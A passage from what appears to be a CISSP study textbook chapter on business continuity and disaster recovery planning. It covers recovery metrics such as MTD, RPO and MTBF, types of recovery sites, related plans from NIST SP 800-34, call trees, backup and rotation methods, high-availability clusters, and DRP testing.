systems. In any BCP/DRP, special attention needs to be paid (no pun intended) to the payroll system 
and how the organization is going to pay employees in the event of a disruption of IT operations. 
Every possible disruption scenario needs to be planned for and vetted to ensure that business will 
continue to function. Employees do not work well when paychecks are late or missing. 

Payroll may be used to determine the outer bound for a MTD. Any one payroll could be impacted 
by a sudden disaster, such as an 1 1:30 AM datacenter flood, when printing paychecks is scheduled 
at noon. Most organizations should not allow unmanaged risk of two missed payrolls: if a company 
pays every 2 weeks, the maximum MTD would be 2 weeks. This is used to determine the outer 
bound; most organizations will determine a far lower MTD (sometimes in days, hours, or less). 


Failure and Recovery Metrics 

A number of metrics are used to quantify how frequently systems fail, how long a 
system may exist in a failed state, and the maximum time to recover from failure. 
These metrics include the Recovery Point Objective (RPO), Recovery Time Objec- 
tive (RTO), Work Recovery Time (WRT), Mean Time Between Failures (MTBF), 
Mean Time to Repair (MTTR), and Minimum Operating Requirements (MOR). 

Recovery Point Objective 

The Recovery Point Objective (RPO) is the amount of data loss or system inaccessi- 
bility (measured in time) that an organization can withstand. “If you perform weekly 
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backups, someone made a decision that your company could tolerate the loss of a 
week’s worth of data. If backups are performed on Saturday evenings and a system 
fails on Saturday afternoon, you have lost the entire week’s worth of data. This is the 
recovery point objective. In this case, the RPO is 1 week.” [2 1 ] 

RPOs are defined by specific actions that require users to obtain data access. For 
example, the RPO for the NASDAQ stock exchange would be: the point in time when 
users are allowed to execute a trade (the next available trading day). 

This requires NASDAQ to always be available during recognized trading hours, 
no matter what. When there are no trades occurring on NASDAQ, the system can 
afford to be off line but in the event of a major disruption, the recovery point objec- 
tive would be when users require access in order to execute a trade. If users fail to 
receive access at the point, then the NASDAQ trading system will suffer a significant 
business impact that would negatively affect the NASDAQ organization. 

The RPO represents the maximum acceptable amount of data/work loss for a 
given process because of a disaster or disruptive event. 

Recovery Time Objective (RTO) and Work Recovery Time (WRT) 

The Recovery Time Objective (RTO) describes the maximum time allowed to 
recover business or IT systems. RTO is also called the systems recovery time. This 
is one part of Maximum Tolerable Downtime: once the system is physically running, 
it must be configured. 

Work Recovery Time (WRT) describes the time required to configure a recovered 
system. “Downtime consists of two elements, the systems recovery time and the 
work recovery time. Therefore, MTD = RTO + WRT.” [22] 

Mean Time Between Failures 

Mean Time Between Failures (MTBF) quantifies how long a new or repaired system 
will run before failing. It is typically generated by a component vendor and is largely 
applicable to hardware as opposed to applications and software. A vendor selling 
LCD computer monitors may run 100 monitors 24 hours a day for 2 weeks and ob- 
serve just one monitor failure. The vendor then extrapolates the following: 

100 LCD computer monitors *14 days *24 hours/day = l failure/33600 hours 

This does not mean that one LCD computer monitor will be able to run for 
3.8 years (33,600 hours) without failing. [23] Each monitor may fail at rates sig- 
nificantly different than this calculated mean (or average in this case). However, for 
planning purposes, we can assume that if we were running an office with 20 monitors, 
we can expect that one will fail about every 70 days. Once the vendor releases the 
MTBF, it is incumbent upon the BCP/DRP team to determine the correct amount of 
expected failures within the IT system during a course of time. Calculating the MTBF 
becomes less reliant when an organization uses fewer and fewer hardware assets. See 
the example below to see how to calculate the MTBF for 20 LCD computer monitors. 


1 failure/33600 hours = 20 LCD computer monitors *X days *24 hours/day 
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Solve for X by dividing both sides of the equation by 20 * 24 

Xdays = 33600/20*24 
X days = 70 


Mean Time to Repair (MTTR) 

The Mean Time to Repair (MTTR) describes how long it will take to recover a 
specific failed system. It is the best estimate for reconstituting the IT system so that 
business continuity may occur. 

Minimum Operating Requirements 

Minimum Operating Requirements (MOR) describe the minimum environmental and 
connectivity requirements in order to operate computer equipment. It is important to 
determine and document what the MOR is for each IT-critical asset because, in the 
event of a disruptive event or disaster, proper analysis can be conducted quickly to 
determine if the IT assets will be able to function in the emergency environment. 

IDENTIFY PREVENTIVE CONTROLS 

Preventive controls prevent disruptive events from having an impact. For example, as 
stated in Chapter 4, Domain 3: Security Engineering, HVAC systems are designed to 
prevent computer equipment from overheating and failing. 

The BIA will identify some risks that may be mitigated immediately. This is 
another advantage of performing BCP/DRP, including the BIA: it improves your 
security, even if no disaster occurs. 

RECOVERY STRATEGY 

Once the BIA is complete, the BCP team knows the Maximum Tolerable Downtime. 
This metric, as well as others including the Recovery Point Objective and Recovery 
Time Objective, is used to determine the recovery strategy. A cold site cannot be 
used if the MTD is 12 hours, for example. As a general rule, the shorter the MTD, the 
more expensive the recovery solution will be, as shown in Figure 8.13. 

You must always maintain technical, physical, and administrative controls when 
using any recovery option. For example, standing in a tent in Louisiana outside of a 
flooded datacenter, after 2005s Hurricane Katrina, does not allow you to say, “We’re 
not going to worry about physical security.” 

Supply Chain Management 

Acquisition of computer equipment and business systems can be fairly straightfor- 
ward during normal business operations. This can change drastically during a disas- 
ter. For example, an organization plans to equip a cold site in the event of disaster and 
purchase 200 computer servers in the event of a disaster. 

If the disaster is localized to that one organization, this strategy can be successful. 
But what if there is a generalized disaster, and many organizations are each seeking 
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Availability 

FIGURE 8.13 Recovery Technologies Cost vs. Availability 


to purchase hundreds of computers? In an age of “just in time” shipment of goods, 
this means many organizations will fail to acquire adequate replacement computers. 
Supply chain management manages this challenge. 

Some computer manufacturers offer guaranteed replacement insurance for a spe- 
cific range of disasters. The insurance is priced per server, and includes a service 
level agreement that specifies the replacement time. The BCP team should analyze 
all forms of relevant insurance. 

Telecommunication Management 

Telecommunication management ensures the availability of electronic communica- 
tions during a disaster. Communications is often one of the first processes to fail 
during a disaster. In the event of a widespread disaster, electricity, landlines, and 
cell phone towers may be inoperable, as they were in Louisiana in the aftermath of 
Hurricane Katrina. In that case, satellite phones were the only means of electronic 
communication immediately after the hurricane. 

Also, most communications systems are designed on the assumption that only a 
small percentage of users will access them simultaneously. Most land lines and cell 
phones became unusable in New York City in the aftermath of the terrorist attacks of 
09/1 1/2001, mostly due to congestion: too many people attempted to simultaneously 
use their phones. 

Wired circuits such as Tls, T3s, frame relay, etc., need to be specifically 
addressed. A normal installation lead-time for a new T 1 circuit may be 30-45 days 
during normal business operations. That alone is longer than most organization’s 
Maximum Tolerable Downtime. Also, lead times tend to lengthen during disasters, 
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as telecommunications providers may need to repair their own systems while man- 
aging increased orders from other organizations affected by a widespread disaster. 

Wireless network equipment can play a crucial role in a successful telecommu- 
nication management plan. Point-to-point wireless links can be quickly established 
by a single organization, and some point-to-point long haul wireless equipment can 
operate at distances 50 miles or more. A generator can provide power if necessary. 

Utility Management 

Utility management addresses the availability of utilities such as power, water, gas, 
etc. during a disaster. Specific utility mitigating controls such as power availability, 
generators, and uninterruptible power supplies are discussed in Chapter 4, Domain 3: 
Security Engineering. 

The utility management plan should address all utilities required by business 
operations, including power, heating, cooling, and water. Specific sections should 
address the unavailability of any required utility. 

Recovery options 

Once an organization has determined its maximum tolerable downtime, the choice 
of recovery options can be determined. For example, a 10-day MTD indicates that a 
cold site may be a reasonable option. An MTD of a few hours indicates that a redun- 
dant site or hot site is a potential option. 

Redundant Site 

A redundant site is an exact production duplicate of a system that has the capabil- 
ity to seamlessly operate all necessary IT operations without loss of services to the 
end user of the system. A redundant site receives data backups in real time so that in 
the event of a disaster, the users of the system have no loss of data. It is a building 
configured exactly like the primary site and is the most expensive recovery option 
because it effectively more than doubles the cost of IT operations. To be fully redun- 
dant, a site must have real-time data backups to the redundant system and the end 
user should not notice any difference in IT services or operations in the event of a 
disruptive event. 


NOTE 

Within the U.S. DoD, IT systems’ criticality is measured against just one thing; how important 
is this IT system for fighting a war? Based on the answer, it can be issued a Mission Assurance 
Category level (MAC level) I, II, or III. MAC I systems within the DoD must maintain 
completely redundant systems that are not colocated with the production system. By definition, 
there is no circumstance when a user of a MAC I system would find the system nonfunctional. 
Not only does this drive up the cost of operations because of the extra manpower and technology 
a redundant site will require, but also because of the protected communications line between each 
backup and production system. Ensuring that the data is mirrored successfully, so that there is 
no loss of service to the end user no matter what catastrophic event may occur, can be a daunting 
task to say the least. 
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Hot site 

A hot site is a location that an organization may relocate to following a major disrup- 
tion or disaster. It is a datacenter with a raised floor, power, utilities, computer periph- 
erals, and fully configured computers. The hot site will have all necessary hardware 
and critical applications data mirrored in real time. A hot site will have the capability 
to allow the organization to resume critical operations within a very short period of 
time — sometimes in less than an hour. 

It is important to note the difference between a hot and redundant site. Hot sites 
can quickly recover critical IT functionality; it may even be measured in minutes 
instead of hours. However, a redundant site will appear as operating normally to 
the end user no matter what the state of operations is for the IT program. A hot site 
has all the same physical, technical, and administrative controls implemented of the 
production site. 

Warm Site 

A warm site has some aspects of a hot site; for example, readily accessible hardware 
and connectivity, but it will have to rely upon backup data in order to reconstitute a 
system after a disruption. It is a datacenter with a raised floor, power, utilities, com- 
puter peripherals, and fully configured computers. 

Because of the extensive costs involved with maintaining a hot or redundant site, 
many organizations will elect to use a warm site recovery solution. These organiza- 
tions will have to be able to withstand an MTD of at least 1-3 days in order to con- 
sider a warm site solution. The longer the MTD is, the less expensive the recovery 
solution will be. Usually, with well-trained personnel and vendor contracts in place, 
a warm site can reconstitute critical IT functionality within a 24—48 hour time period. 

Cold Site 

A cold site is the least expensive recovery solution to implement. It does not include 
backup copies of data, nor does it contain any immediately available hardware. After 
a disruptive event, a cold site will take the longest amount of time of all recovery 
solutions to implement and restore critical IT services for the organization. Especial- 
ly in a disaster area, it could take weeks to get vendor hardware shipments in place 
so organizations using a cold site recovery solution will have to be able to withstand 
a significantly long MTD — usually measured in weeks, not days. A cold site is typi- 
cally a datacenter with a raised floor, power, utilities, and physical security, but not 
much beyond that. 

Reciprocal Agreement 

Reciprocal agreements are a bi-directional agreement between two organizations in 
which one organization promises another organization that it can move in and share 
space if it experiences a disaster. It is documented in the form of a contract written 
to gain support from outside organizations in the event of a disaster. They are also 
referred to as Mutual Aid Agreements (MAAs) and they are structured so that each 
organization will assist the other in the event of an emergency. 
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NOTE 

In the U.S. Military, Southern Command (SOUTHCOM) is located in Miami, Florida, and Central 
Command (CENTCOM) is located in Tampa, Florida. For years, each command had a reciprocal 
agreement with one another in the event of a natural disaster. If SOUTHCOM had to evacuate because 
of a hurricane warning, all critical operations would be transferred to CENTCOM’s Tampa location. 
Of course, there was a flaw with that plan. What would each command do if the same natural disaster 
threatened both locations? This occurred during hurricane Andrew. Homestead Air Force Base (the 
headquarters for SOUTHCOM) was completely destroyed and the hurricane also crippled the Tampa, 
Florida area closing MacDill Air Force Base (the home of CENTCOM). Since then, each command 
must have emergency operations centers located outside the Southeastern United States. 


Mobile Site 

Mobile sites are “datacenters on wheels”: towable trailers that contain racks of com- 
puter equipment, as well as HVAC, fire suppression and physical security. They are a 
good fit for disasters such as a datacenter flood, where the datacenter is damaged but 
the rest of the facility and surrounding property are intact. They may be towed onsite, 
supplied power and network, and brought online. 

Mobile datacenters are typically placed within the physical property lines, and 
are protected by defenses such as fences, gates, and security cameras. Another 
advantage is that personnel can report to their primary site and offices. 

Subscription Services 

Some organizations outsource their BCP/DRP planning and/or implementation by 
paying another company to perform those services. This effectively transfers the risk 
to the insurer company. This is based upon a simple insurance model, and companies 
such as IBM have built profit models and offer services for customers offering BCP/ 
DRP insurance. 

IBM’s SunGard BCP/DRP casualty services (http://www.sungard.com/) is an 
example of a subscription service. 


RELATED PLANS 

As discussed previously, the Business Continuity Plan is an umbrella plan that con- 
tains others plans. In addition to the Disaster recovery plan, other plans include the 
Continuity of Operations Plan (COOP), the Business Resumption/Recovery Plan 
(BRP), Continuity of Support Plan , Cyber Incident Response Plan, Occupant Emer- 
gency Plan (OEP), and the Crisis Management Plan (CMP). Table 8.5, from NIST 
Special Publication 800-34, summarizes these plans. 

Continuity of Operations Plan (COOP) 

The Continuity of Operations Plan (COOP) describes the procedures required to 
maintain operations during a disaster. This includes transfer of personnel to an alter- 
nate disaster recovery site, and operations of that site. 
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Table 8.5 Summary of BCP plans from NIST SP 800-34 [24] 


Plan 

Purpose 

Scope 

Business 
Continuity Plan 
(BCP) 

Provide procedures for sustaining 
essential business operations while 
recovering from a significant 
disruption 

Addresses business 
processes; IT addressed 
based only on its support for 
business process 

Business 

Recovery (or 
Resumption) 

Plan (BRP) 

Provide procedures for recovering 
business operations immediately 
following a disaster 

Addresses business 
processes; not IT-focused; IT 
addressed based only on its 
support for business process 

Continuity of 
Operations Plan 
(COOP) 

Provide procedures and 
capabilities to sustain an 
organization's essential, strategic 
functions at an alternate site for up 
to 30 days 

Addresses the subset of an 
organization’s missions that 
are deemed most critical; 
usually wntten at 
headquarters level; not IT- 
focused 

Continuity of 
Support Plan/IT 
Contingency Plan 

Provide procedures and 
capabilities for recovering a major 
application or general support 
system 

Same as IT contingency 
plan; addresses IT system 
disruptions; not business 
process focused 

Crisis 

Communications 

Plan 

Provides procedures for 
disseminating status reports to 
personnel and the public 

Addresses communications 
with personnel and the 
public; not IT focused 

Cyber Incident 
Response Plan 

Provide strategies to detect, 
respond to, and limit consequences 
of malicious cyber incident 

Focuses on information 
security responses to 
incidents affecting systems 
and/or networks 

Disaster 

Recovery Plan 
(DRP) 

Provide detailed procedures to 
facilitate recovery of capabilities at 
an alternate site 

Often IT-focused; limited to 
major disruptions with long- 
term effects 

Occupant 
Emergency Plan 
(OEP) 

Provide coordinated procedures for 
minimizing loss of life or injury and 
protecting property damage in 
response to a physical threat 

Focuses on personnel and 
property particular to the 
specific facility; not business 
process or IT system 
functionality based 


Business Recovery Plan (BRP) 

The Business Recovery Plan (also known as the Business Resumption Plan) details 
the steps required to restore normal business operations after recovering from a dis- 
ruptive event. This may include switching operations from an alternate site back to a 
(repaired) primary site. 

The Business Recovery Plan picks up when the COOP is complete. This plan is 
narrow and focused: the BRP is sometimes included as an appendix to the Business 
Continuity Plan. 

Continuity of Support Plan 

The Continuity of Support Plan focuses narrowly on support of specific IT systems 
and applications. It is also called the IT Contingency Plan, emphasizing IT over 
general business support. 
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Cyber Incident Response Plan 

The Cyber Incident Response Plan is designed to respond to disruptive cyber events, 
including network-based attacks, worms, computer viruses, Trojan horses, etc. For 
example, self-propagating malicious code such as worms has the potential to disrupt 
networks. Loss of network connectivity alone may constitute a disaster for many 
organizations. 

Occupant Emergency Plan (OEP) 

The Occupant Emergency Plan (OEP) provides the “response procedures for 
occupants of a facility in the event of a situation posing a potential threat to the health 
and safety of personnel, the environment, or property. Such events would include a 
fire, hurricane, criminal attack, or a medical emergency.” [25] This plan is facilities- 
focused, as opposed to business or IT-focused. 

The OEP is focused on safety and evacuation, and should describe specific safety 
drills, including evacuation drills (also known as fire drills). Specific safety roles 
should be described, including safety warden and meeting point leader, as described 
in Chapter 4, Domain 3: Security Engineering. 

Crisis Management Plan (CMP) 

The Crisis Management Plan (CMP) is designed to provide effective coordination 
among the managers of the organization in the event of an emergency or disruptive 
event. The CMP details the actions management must take to ensure that life and 
safety of personnel and property are immediately protected in case of a disaster. 

Crisis Communications Plan 

A critical component of the Crisis Management Plan is the Crisis Communications 
Plan (sometimes simply called the communications plan): a plan for communicating 
to staff and the public in the event of a disruptive event. Instructions for notifying the 
affected members of the organization are an integral part to any BCP/DRP. 

It is often said that bad news travels fast. Also, in the event of a post-disaster 
information vacuum, bad information will often fill the void. Public relations profes- 
sionals understand this risk, and know to consistently give the organization’s “official 
story,” even when there is little to say. All communication with the public should be 
channeled via senior management or the public relations team. 

Call Trees 

A key tool leveraged for staff communication by the Crisis Communications Plan is 
the Call Tree, which is used to quickly communicate news throughout an organiza- 
tion without overburdening any specific person. The call tree works by assigning 
each employee a small number of other employees they are responsible for calling in 
an emergency event. For example, the organization president may notify his board of 
directors of an emergency situation and they, in turn, will notify their top tier manag- 
ers. The top tier managers will then call the people they have been assigned to call. 
The call tree continues until all affected personnel have been contacted. 
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The call tree is most effective when there is a two-way reporting of successful com- 
munication. For example, each member of the board of directors would report back to 
the president when each of their assigned call tree recipients had been contacted and had 
made contact with their subordinate personnel. Remember that cell phones and land- 
lines may become congested or unusable during a disaster: the call tree should contain 
alternate contact methods in case the primary methods are unavailable. 

Call trees work best when planned for in advanced and drilled at least once per year. 
Phone numbers change, employees change positions, and contact information becomes 
out of date. A routine drill along with documented procedures and reporting chains 
keeps the call tree’s functionality at the optimum level. Figure 8.14 illustrates a typical 
call tree. In this example, a high-level manager activates the call tree, calling three front 
line managers. Each front line manager calls the employees they are responsible for. 

Automated Call Trees 

Automated call trees automatically contact all BCP/DRP team members after a dis- 
ruptive event. Third-party BCP/DRP service providers may provide this service. The 



FIGURE 8.14 The Call Tree 
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automated tree is populated with team members’ primary phone, cellular phone, 
pager, email, and/or fax. 

An authorized member can activate the tree, via a phone call, email, or web trans- 
action. Once triggered, all BCP/DRP members are automatically contacted. Systems 
can require positive verification of receipt of a message, such as “press 1 to acknowl- 
edge receipt.” This addresses messages answered via voice mail. Other systems may 
automatically join members to a conference bridge: “Press 1 to join the BCP/DRP 
conference.” This feature can greatly lower the time required to communicate to team 
members. 

Automated call trees are hosted offsite, and typically supported by a third-party 
BCP/DRP provider. This provides additional communication protection: the third- 
party company is less likely to be affected by a disaster, meaning the automated call 
tree is likely to work even after the client organization’s communications systems 
have failed. 

Emergency Operations Center (EOC) 

The Emergency Operations Center (EOC) is the command post established during or 
just after an emergency event. Placement of the EOC will depend on resources that 
are available. For larger organizations, the EOC may be a long distance away from 
the physical emergency; however, protection of life and personnel safety is always of 
the utmost importance. 

Vital Records 

Vital records should be stored offsite, at a location and in a format that will allow 
access during a disaster. It is best practice to have both electronic and hardcopy 
versions of all vital records. 

Vital records include contact information for all critical staff. Additional vital 
records include licensing information, support contracts, service level agreements, 
reciprocal agreements, telecom circuit IDs, etc. 

Executive Succession Planning 

Organizations must ensure that there is always an executive available to make deci- 
sions during a disaster. Executive Succession Planning determines an organization’s 
line of succession. Executives may become unavailable due to a variety of disas- 
ters, ranging from injury and loss of life, to strikes, travel restrictions, and medical 
quarantines. 

A common Executive Succession Planning mistake is allowing entire executive 
teams to be offsite at distant meetings. Should a transportation interruption (such as 
the interruption of airline flights that occurred in the United States in the days follow- 
ing 9/11/2001) occur while the executive team is offsite, the company’s home office 
could be left without any decision-making capability. One of the simplest executive 
powers is the ability to endorse checks and procure money. 
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LEARN BY EXAMPLE 

United States Government Executive Succession Planning 

The United States government’s presidential line of succession is a result of executive succession 
planning at a nationwide level: “Whenever the office of President of the United States becomes 
vacant due to ‘removal ... death or resignation’ of the chief executive, the Constitution provides 
that ‘the Vice President shall become President.’ When the office of Vice President becomes 
vacant for any reason, the President nominates a successor, who must be confirmed by a majority 
vote of both houses of Congress. If both of these offices are vacant simultaneously, then, under 
the Succession Act of 1947, the Speaker of the House of Representatives becomes President, 
after resigning from the House and as Speaker. If the speakership is also vacant, then the 
President Pro Tempore of the Senate becomes President, after resigning from the Senate and as 
President Pro Tempore. If both of these offices are vacant, or if the incumbents fail to qualify 
for any reason, then cabinet officers are eligible to succeed, in the order established by law 
(3 U.S.C. §19, see Table 3). In every case, a potential successor must be duly sworn in his or her 
previous office, and must meet other constitutional requirements for the presidency, i.e., be at least 
35 years of age.” [26] 

The United States line of succession includes, in order, Vice President, Speaker of the House, 
President Pro Tempore of the Senate, Secretary of State, Secretary of the Treasury, Secretary 
of Defense, Attorney General, Secretary of the Interior, Secretary of Agriculture, Secretary of 
Commerce, Secretary of Labor, Secretary of Health and Human Services, Secretary of Housing 
and Urban Development, Secretary of Transportation, Secretary of Energy, Secretary of Education, 
Secretary of Veterans Affairs, and Secretary of Homeland Security. 

The United States government understands the criticality of ensuring that an executive remains 
in power in the event of disaster no matter how disruptive the disaster may be. Most organizations 
will have a shorter line of succession, but should always consider the worst-case scenario during 
Executive Succession Planning. 


PLAN APPROVAL 

Now that the initial BCP/DRP plan has been completed, senior management approval 
is the required next step. It is ultimately senior management’s responsibility to pro- 
tect an organization’s critical assets and personnel. Due to its complexity, the BCP/ 
DRP plan will represent the collected work of many individuals and many lines of 
business. Senior management must understand that they are responsible for the plan, 
fully understand the plan, take ownership of it, and ensure its success. 


BACKUPS AND AVAILABILITY 

Although backup techniques are also reviewed as part of the Fault Tolerance section 
discussed previously in this chapter, discussions of Business Continuity and Disas- 
ter Recovery Planning would be remiss if attention were not given to backup and 
availability planning techniques. In order to be able to successfully recover critical 
business operations, the organization needs to be able to effectively and efficiently 
backup and restore both systems and data. Though many organizations are diligent 
about going through the process of creating backups, verification of recoverability 
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from those backup methods is at least as important and is often overlooked. When 
the detailed recovery process for a given backup solution is thoroughly reviewed, 
some specific requirements will become obvious. One of the most important points 
to make when discussing backup with respect to disaster recovery and business con- 
tinuity is ensuring that critical backup media is stored offsite. Further, that offsite 
location should be situated such that, during a disaster event, the organization can 
efficiently access the media with the purpose of taking it to a primary or secondary 
recovery location. 

A further consideration beyond efficient access to the backup media being lever- 
aged is the ability to actually restore said media at either the primary or secondary 
recovery facility. Quickly procuring large high-end tape drives for reading special- 
purpose, high-speed, high-capacity tape solutions is untenable during most disasters. 
Yet many recovery solutions either simply ignore this fact or erroneously build the 
expectation of prompt acquisition into their MTTR calculations. 

Due to the ever-shrinking MTD calculations at many organizations, with some 
systems now actually requiring Continuous Availability (an MTD of zero), organiza- 
tions now often must review their existing backup paradigms to determine whether 
the MTTR of the standard solution exceeds the MTD for the systems covered. If the 
MTTR is greater than the MTD, then an alternate backup or availability methodol- 
ogy must be employed. While traditional tape solutions are always getting faster 
and capable of holding more data, for some critical systems, tape-oriented backup 
and recovery solutions might not be viable because of the protracted recovery time 
associated with acquiring the necessary tapes and pulling the associated system 
image and/or data from the tapes. 


NOTE 

When considering the backup and availability of systems and data, be certain to address software 
licensing considerations. Though some vendors only require licenses for the total number of their 
product actively being used at one time, which could accommodate some recovery scenarios 
involving failover operations, others would require a full license for each system that might be 
used. Also, when recovering back to the primary computing facility, it is common to have both the 
primary and secondary systems online simultaneously, and, even if that is not typically the case, 
to consider whether the vendor expects a full license for both systems. Another point regarding 
licensing and recovery is that many vendors will allow cheaper licenses to cover the hot spare, 
hot standby, failover, or passive system in an active-passive cluster as long as only one of those 
systems will be processing at any given time. The complexities and nuances of individual vendors’ 
licensing terms are well beyond the scope of both this book and the CISSP® exam, but be certain to 
determine what the actual licensing needs are in order to legally satisfy recovery. 


HARDCOPY DATA 

In the event that there is a disruptive event such as a natural disaster that disables the 
local power grid, and power dependency is problematic, there is the potential to op- 
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erate the organization’s most critical functions using only hardcopy data. Hardcopy 
data is any data that are accessed through reading or writing on paper rather than 
processing through a computer system. 

In such weather-emergency-prone areas such as Florida, Mississippi, and Louisi- 
ana, many businesses develop a “paper only” DRP, which will allow them to operate 
key critical processes with just hard copies of data, battery-operated calculators, and 
other small electronics, as well as pens and pencils. One such organization is the 
Lynx transit system responsible for public bus operations in the Florida Orlando area. 
In the event that a natural disaster disables utilities and power, the system does have a 
process in place where all bus operations will move to paper-and-pencil record keep- 
ing until such a time as when power can be restored. 

ELECTRONIC BACKUPS 

Electronic backups are archives that are stored electronically and can be retrieved in 
case of a disruptive event or disaster. Choosing the correct data backup strategy is 
dependent upon how users store data, the availability of resources and connectivity, 
and what the ultimate recovery goal is for the organization. 

Preventative restoration is a recommended control: restore data to test the validity 
of the backup process. If a reliable system (such as a mainframe) copies data to tape 
every day for years, what assurance does the organization have that the process is 
working? Do the tapes (and data they contain) have integrity? 

Many organizations discover backup problems at the worst time: after an opera- 
tional data loss. A preventative restoration can identify problems before any data is 
lost. 

Full Backups 

A full system backup means that every piece of data is copied and stored on the 
backup repository. Conducting a full backup is time consuming, bandwidth inten- 
sive, and resource intensive. However, full backups will ensure that any necessary 
data is assured. 

Incremental Backups 

Incremental backups archive data that have changed since the last full or incremental 
backup. For example, a site performs a full backup every Sunday, and daily incre- 
mental backups from Monday through Saturday. If data are lost after the Wednesday 
incremental backup, four tapes are required for restoration: the Sunday full backup, 
as well as the Monday, Tuesday, and Wednesday incremental backups. 

Differential Backups 

Differential backups operate in a similar manner as the incremental backups except 
for one key difference. Differential backups archive data that have changed since the 
last full backup. 

For example, the same site in our previous example switches to differential back- 
ups. They lose data after the Wednesday differential backup. Now only two tapes 
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are required for restoration: the Sunday full backup and the Wednesday differential 
backup. 

Tape Rotation Methods 

A common tape rotation method is called FIFO (First In First Out). Assume you are 
performing full daily backups, and have 14 rewritable tapes total. FIFO (also called 
round robin) means you will use each tape in order, and cycle back to the first tape 
after the 14 th is used. This ensures 14 days of data is archived. The downside of this 
plan is you only maintain 14 days of data: this schedule is not helpful if you seek to 
restore a file that was accidentally deleted 3 weeks ago. 

Grandfather-Father-Son (GFS) addresses this problem. There are 3 sets of tapes: 
7 daily tapes (the son), 4 weekly tapes (the father), and 12 monthly tapes (the grand- 
father). Once per week a son tape graduates to father. Once every 5 weeks a father 
tape graduates to grandfather. After running for a year this method ensures there are 
backup tapes available for the past 7 days, weekly tapes for the past 4 weeks, and 
monthly tapes for the past 12 months. 

Electronic Vaulting 

Electronic vaulting is the batch process of electronically transmitting data that is to 
be backed up on a routine, regularly scheduled time interval. It is used to transfer 
bulk information to an offsite facility. There are a number of commercially available 
tools and services that can perform electronic vaulting for an organization. Electronic 
Vaulting is a good tool for data that need to be backed up on a daily or possibly even 
hourly rate. It solves two problems at the same time. It stores sensitive data offsite 
and it can perform the backup at very short intervals to ensure that the most recent 
data is backed up. 

Because electronic vaulting occurs across the Internet in most cases, it is impor- 
tant that the information sent for backup be sent via a secure communication channel 
and protected through a strong encryption protocol. 

Remote Journaling 

A database journal contains a log of all database transactions. Journals may be used 
to recover from a database failure. Assume a database checkpoint (snapshot) is saved 
every hour. If the database loses integrity 20 minutes after a checkpoint, it may be 
recovered by reverting to the checkpoint, and then applying all subsequent transac- 
tions described by the database journal. 

Remote Journaling saves the database checkpoints and database journal to a 
remote site. In the event of failure at the primary site, the database may be recovered. 

Database Shadowing 

Database shadowing uses two or more identical databases that are updated simul- 
taneously. The shadow database(s) can exist locally, but it is best practice to host 
one shadow database offsite. The goal of database shadowing is to greatly reduce 
the recovery time for a database implementation. Database shadowing allows faster 
recovery when compared with remote journaling. 
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HA Options 

Increasingly, systems are being required to have effectively zero downtime, an MTD 
of zero. Recovery of data on tape is certainly ill equipped to meet these availability 
demands. The immediate availability of alternate systems is required should a failure 
or disaster occur. A common way to achieve this level of uptime requirement is to 
employ a high availability cluster. 


NOTE 

Different vendors use different terms for the same principles of having a redundant system 
actively processing or available for processing in the event of a failure. Though the particular 
implementations might vary slightly, the overarching goal of continuous availability typically is met 
with similar though not identical methods, if not terms. 


The goal of a high availability cluster is to decrease the recovery time of a system 
or network device so that the availability of the service is less impacted than would 
be by having to rebuild, reconfigure, or otherwise stand up a replacement system. 
Two typical deployment approaches exist: 

• Active-active cluster involves multiple systems all of which are online and 
actively processing traffic or data. This configuration is also commonly referred 
to as load balancing, and is especially common with public facing systems such 
as Web server farms. 

• Active-passive cluster involves devices or systems that are already in place, 
configured, powered on, and ready to begin processing network traffic should a 
failure occur on the primary system. Active-passive clusters are often designed 
such that any configuration changes made on the primary system or device 

are replicated to the standby system. Also, to expedite the recovery of the 
service, many failover cluster devices will automatically, with no required user 
interaction, have services begin being processed on the secondary system should 
a disruption impact the primary device. It can also be referred to as a hot spare, 
standby, or failover cluster configuration. 

SOFTWARE ESCROW 

With the ubiquity of the outsourcing of software and application development to 
third parties, organizations must be sure to maintain the availability of their applica- 
tions even if the vendor that developed the software initially goes out of business. 
Vendors who have developed products on behalf of other organizations might well 
have intellectual property and competitive advantage concerns about disclosing 
the source code of their applications to their customers. A common middle ground 
between these two entities is for the application development company to allow 
a neutral third party to hold the source code. This approach is known as software 
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escrow. Should the development organization go out of business or otherwise violate 
the terms of the software escrow agreement, the third party holding the escrow will 
provide the source code and any other information to the purchasing organization. 


DRP TESTING, TRAINING AND AWARENESS 

Testing, training, and awareness must be performed for the “disaster” portion of a 
BCP/DRP. Skipping these steps is one of the most common BCP/DRP mistakes. 
Some organizations “complete” their DRP, and then consider the matter resolved 
and put the big DRP binder on a shelf to collect dust. This proposition is wrong on 
numerous levels. 

First, a DRP is never complete, but is rather a continually amended method for 
ensuring the ability for the organization to recover in an acceptable manner. Second, 
while well-meaning individuals carry out the creation and update of a DRP, even the 
most diligent of administrators will make mistakes. To find and correct these issues 
prior to their hindering recovery in an actual disaster testing must be carried out on a 
regular basis. Third, any DRP that will be effective will have some inherent complex 
operations and maneuvers to be performed by administrators. There will always be 
unexpected occurrences during disasters, but each member of the DRP should be 
exceedingly familiar with the particulars of their role in a DRP, which is a call for 
training on the process. 

Finally, awareness of the general user’s role in the DRP, as well as awareness of 
the organization’s emphasis on ensuring the safety of personnel and business opera- 
tions in the event of a disaster, is imperative. This section will provide details on steps 
to effectively test, train, and build awareness for the organization’s DRP. 

DRP TESTING 

In order to ensure that a Disaster Recovery Plan represents a viable plan for recov- 
ery, thorough testing is needed. Given the DRP’s detailed tactical subject matter, 
it should come as no surprise that routine infrastructure, hardware, software, and 
configuration changes will alter the way the DRP needs to be carried out. Organiza- 
tions’ information systems are in a constant state of flux, but unfortunately, much of 
these changes do not readily make their way into an updated DRP. To ensure both the 
initial and continued efficacy of the DRP as a feasible recovery methodology, testing 
needs to be performed. 

The different types of tests, as well as their associated advantages and disadvan- 
tages, will be discussed below. However, at an absolute minimum, regardless of the 
type of test selected, these tests should be performed on an annual basis. Many orga- 
nizations can, should, and do test their DRP with more regularity, which is laudable. 

DRP Review 

The DRP Review is the most basic form of initial DRP testing, and is focused on sim- 
ply reading the DRP in its entirety to ensure completeness of coverage. This review is 
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typically to be performed by the team that developed the plan, and will involve team 
members reading the plan in its entirety to quickly review the overall plan for any 
obvious flaws. The DRP Review is primarily just a sanity check to ensure that there 
are no glaring omissions in coverage or fundamental shortcomings in the approach. 

Read-Through 

Read-Through (also known as checklist or consistency ) testing lists all necessary 
components required for successful recovery, and ensures that they are, or will be, 
readily available should a disaster occur. For example, if the disaster recovery plan 
calls for the reconstitution of systems from tape backups at an alternate computing 
